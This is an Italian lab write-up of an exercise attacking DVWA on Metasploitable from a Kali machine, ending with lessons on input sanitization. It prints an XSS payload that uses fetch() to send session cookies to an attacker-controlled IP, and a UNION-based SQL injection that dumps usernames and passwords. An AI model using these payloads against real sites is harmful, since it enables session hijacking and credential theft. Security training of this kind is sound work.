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S6 L2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Exploit DVWA - XSS e SQL injection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Obiettivo e Configurazione dell'Ambiente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L’obiettivo dell’esercizio era configurare un ambiente virtuale per eseguire attacchi Cross-Site Scripting (XSS) e SQL Injection sulla DVWA, simulando tecniche comunemente sfruttate dagli attaccanti per ottenere informazioni sensibili. Il laboratorio è stato configurato utilizzando due macchine virtuali: Metasploitable per ospitare la DVWA e Kali Linux come macchina di attacco. Le macchine sono state connesse e testate per assicurare una comunicazione diretta.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Sfruttamento della Vulnerabilità XSS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l'attacco XSS, è stato utilizzato il seguente payload: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fetch("http://192.168.1.4:80/?cookie=" + document.cookie);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iniezione ha avuto come scopo il furto dei cookie di sessione dell'utente, inviandoli a un server remoto (modificando l'IP con quello della macchina Kali). Questa tecnica riflette una tipica vulnerabilità XSS, dove l’attaccante riesce a iniettare codice JavaScript dannoso in una pagina vulnerabile, manipolando il browser della vittima per inviare i cookie al server dell’attaccante. I cookie di sessione potrebbero essere usati per impersonare l'utente e ottenere accesso non autorizzato.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0588" cy="35720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4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7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Sfruttamento della Vulnerabilità SQL Injection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dell’attacco SQL Injection, è stato utilizzato il payload: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UNION SELECT user, password FROM users #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query è stata inserita in un campo di input vulnerabile della DVWA e ha consentito di estrarre informazioni sensibili dal database, come gli username e le password degli utenti. La SQL Injection ha funzionato sfruttando una debolezza nei filtri di input, permettendo alla query di aggirare i controlli e restituire informazioni di autenticazione non autorizzate.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1175" cy="448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L’esercizio ha dimostrato l'impatto di vulnerabilità comuni, come XSS e SQL Injection, che possono compromettere seriamente la sicurezza di un'applicazione web. La possibilità di rubare cookie di sessione e accedere ai dati degli utenti evidenzia l'importanza di implementare misure di sicurezza, come la sanificazione degli input e la protezione dei dati di sessione, per prevenire attacchi di questo tipo.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.9133858267732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